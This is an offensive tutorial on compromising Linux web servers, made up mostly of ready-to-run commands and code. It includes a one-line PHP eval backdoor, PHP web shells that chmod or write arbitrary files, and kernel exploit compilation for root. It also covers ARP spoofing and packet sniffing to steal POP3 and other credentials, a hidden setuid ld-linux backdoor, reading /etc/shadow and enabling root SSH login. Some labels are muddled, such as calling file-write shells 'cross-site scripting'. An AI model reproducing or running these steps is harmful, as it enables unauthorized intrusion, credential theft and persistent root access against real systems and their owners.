Step‑by‑Step Linux Privilege Escalation and Exploit Techniques

Write a one‑line PHP backdoor: <?php @eval($_POST[md5])?> Upload the file to the target server and verify its presence.

1. Initial enumeration and cross‑site attempts

List directories on the web server (e.g., ls -la /www.users/) to locate writable locations.

2. Privilege escalation via local exploits

Obtain an interactive shell using Python: python -c 'import pty; pty.spawn("/bin/sh")' Check current user ID and kernel version:

id

uname -r

Linux privilege escalation methods include third‑party software vulnerabilities, trusted local features, and kernel overflows. Useful exploit repositories:

http://tools.90sec.org/

http://sebug.net/paper/linux_exp/

http://x73.cc/bitch/exp/

http://www.exploit-db.com/search/

Compile a custom exploit (e.g., gcc -o 2 2.c) and set execution permissions ( chmod +x 2).

Install required libraries for arpsniffer.c:

rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm

wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz

tar zxvf libpcap-0.8.1.tar.gz

cd libpcap-0.8.1 && ./configure && make && make install

Recompile arpsniffer.c:

gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

Run the sniffer to spoof the gateway and capture traffic:

./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

Capture packets with tcpdump:

tcpdump -i eth0 host 192.168.0.11

tcpdump -i eth0 host 172.16.0.12 -w pop.txt

Analyze the capture (e.g., with Wireshark) to extract usernames and passwords.

Modify linsniffer.c to monitor specific ports (FTP, SSH, Telnet, HTTP, POP3, etc.) and compile: gcc -o linsniffer linsniffer.c Run the sniffer and find credentials saved in tcp.log.

3. Cross‑site scripting backdoor

PHP code to change permissions of arbitrary paths:

$path = stripslashes($_GET['path']);

$ok = chmod($path, 0777);

if ($ok) echo "CHMOD OK";

Save as tmdsb.php and invoke with a crafted path parameter.

Another PHP snippet to write arbitrary data to a file:

$filename = stripslashes($_POST['filename']);

$mess = stripslashes($_POST['mess']);

$fp = @fopen($filename, 'a');

@fputs($fp, $mess);

@fclose($fp);

4. Kernel and udev exploits for root

Compile and run kernel‑level exploits (e.g., pwnkernel.c, wunderbar_emporium.sh, exploit.c) to obtain a local root shell.

Create a set‑uid backdoor:

cp /lib/ld-linux.so.2 /tmp/.str1ven

chmod +s .str1ven

Execute the backdoor to regain root privileges.

Useful system commands for post‑exploitation:

cat /etc/passwd

cat /etc/shadow

ifconfig

netstat -an | grep LISTEN

service --status-all

lsb_release -a

Modify SSH configuration to allow root login ( PasswordAuthentication yes) and restart the service.

Additional privilege‑escalation tricks include editing /etc/passwd directly, using sed to change UID/GID, and creating large files for certain kernel exploits.